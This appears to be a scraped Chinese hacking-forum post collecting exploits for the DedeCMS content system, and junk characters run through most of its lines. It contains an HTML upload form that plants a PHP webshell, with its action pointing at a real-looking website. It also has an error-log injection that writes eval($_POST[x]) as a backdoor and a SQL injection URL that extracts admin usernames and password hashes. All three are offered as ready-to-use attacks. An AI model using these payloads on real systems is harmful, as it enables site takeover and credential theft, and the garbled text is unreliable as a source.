/ V% L& V. t5 {3 B" v2 S<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>( q' n! w% j6 A* }) \
</head>( r. g) J7 ~$ q2 n
<body style="FONT-SIZE: 9pt">+ r" V2 E: p) G3 P9 C3 U: U5 X
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
' G% y; c" v* I8 L+ E<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>2 d- e z6 [' I) C
<input type='hidden' name='activepath' value='/data/cache/' />. p' }1 Q5 F7 Q. i6 g8 K4 P9 C( G6 P
<input type='hidden' name='cfg_basedir' value='../../' />
# @/ q1 d# a' R1 H& C) e<input type='hidden' name='cfg_imgtype' value='php' />
% d$ w Z1 y# z; b' k3 P<input type='hidden' name='cfg_not_allowall' value='txt' />
* N6 o1 i( K* r) x- m# ^<input type='hidden' name='cfg_softtype' value='php' />
0 `* C# [( \/ t+ d' s<input type='hidden' name='cfg_mediatype' value='php' />( s+ u/ {. A( S6 K. g* m. O
<input type='hidden' name='f' value='form1.enclosure' />$ O i% @2 H( n- x8 ] Z
<input type='hidden' name='job' value='upload' />" Q! R4 [1 F4 [3 f
<input type='hidden' name='newname' value='fly.php' />
* m! O: m8 Y7 uSelect U Shell <input type='file' name='uploadfile' size='25' />
$ d- X9 A- z& p; Z<input type='submit' name='sb1' value='确定' />
B% n* F& v% [* u- M$ O! I2 T; a$ Q</form>: O6 T9 o; V) v9 h9 @& @+ q0 \6 c
<br />It's just a exp for the bug of Dedecms V55...<br />1 _8 ?" _, g9 F/ H. d+ }
Need register_globals = on...<br />( b4 d: m- F1 n
Fun the game,get a webshell at /data/cache/fly.php...<br />
# I5 s7 Q" n- r" d* a</body>
5 f9 p; H- }0 m) ~# w# T1 B</html>/ u/ {5 z' j; s' O' Y( q
1 m& A5 v2 p8 |! y3 O2 m% J' p
& u8 a/ d w# R) f7 r
8 \0 P' N4 g [5 f. q- f4 ?, H& Q: ]/ }4 H6 F9 T* k
4 P l" e- E5 D/ D0 D
& ?# I! o& k& s" c7 K( \; L& {2 q
& f9 o/ V5 I: i- K$ L) Q0 V, t5 X$ [/ ~
# J# X9 ?: @+ Y6 S5 K9 v
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
2 U: s% W; C8 {1 ]$ }5 A利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。3 ^4 U8 G- H8 q; j' {
1. 访问网址:
: X+ L; I! h! G) l6 ]2 c6 qhttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>! R2 U. t6 h) M `+ O2 P3 x
可看见错误信息* W2 U: B1 q2 I! |8 [7 S9 N
( S8 S- r, {' e
. Y' w) z P7 x: \* N2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
: h) r% b3 W" D5 I9 }int(3) Error: Illegal double '1024e1024' value found during parsing
8 V; l2 w% B4 G9 `+ A! h5 bError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
1 P' ~# x6 ?1 C t" ]* } r# z! M% p- l% m' e% F0 k
! Z1 M: O' |; @0 a+ M
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
) F5 J7 l& J7 D) v/ r! n
$ o- q- l% e* u7 [7 }- g
- t! n C0 h+ \) t7 e5 W& u<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”> M1 z6 o2 j! f8 H- v
/ b& P7 T4 Y" I& ` s5 Y4 @$ u* V" j8 I4 [( O) _9 x( k( X
按确定后的看到第2步骤的信息表示文件木马上传成功.
' }7 g7 m7 X8 D# x1 w Y. l" {6 n$ T) m# T. N: H
! p( r! O* k( K' x9 I# } v8 F. a' }; ^/ r3 K! u* F
T+ k+ S1 s2 |! U) |3 M m+ _ E2 [# Q- W/ {; c
2 I2 {! P3 F( ~
/ q+ ^2 _' J2 N
& m6 g: |5 X$ t! z1 w7 o& N
F3 w) h) p5 e+ h! O
4 F) N! z; g, L0 X) t2 w, k
! i [3 D* }5 t
* M1 _" O l6 ?) v( P2 @
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
! ~( w' E; \( I9 h- \http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对